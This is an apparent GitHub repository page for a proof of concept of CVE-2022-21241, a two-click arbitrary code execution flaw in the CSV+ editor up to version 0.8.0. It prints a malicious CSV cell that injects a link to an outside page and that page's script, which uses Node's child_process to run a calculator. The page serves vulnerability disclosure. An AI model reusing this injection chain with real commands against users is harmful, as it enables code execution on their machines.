Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

satoki/csv-plus_vulnerability

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

16 Commits

Repository files navigation

csv-plus_vulnerability

πŸ‘» 2-Click Arbitrary Code Execution Vulnerability.

PoC.gif

CVE-2022-21241

⚠
This PoC was created to alert users and investigate vulnerabilities in their own CSV+, and is prohibited to be used for attacks.

Vulnerability

The following versions are vulnerable.

  • CSV+ <= 0.8.0

Attackers can execute arbitrary code by using the Node.js functionality. They will place the malicious js code on some site and link it from a-tags with the HTML injection vulnerability in CSV+.

PoC

scenario.png

Malicious csv file

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me πŸ‘»</a>

https://electronooooo.htmlbin.net/xsscalc.html is a temporary link.

Malicious html file (calc)

<!DOCTYPE html>
<html>
 <head>
 <script>
 if (confirm("Do you want to run a calculator to check for vulnerabilities?")){
 var cmd = "calc";
 require("child_process").exec(cmd);
 }
 </script>
 </head>
 <body>
 Hi :)
 </body>
</html>

About

πŸ‘» [PoC] CSV+ 0.8.0 - Arbitrary Code Execution (CVE-2022-21241)

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

AltStyle γ«γ‚ˆγ£γ¦ε€‰ζ›γ•γ‚ŒγŸγƒšγƒΌγ‚Έ (->γ‚ͺγƒͺγ‚ΈγƒŠγƒ«) /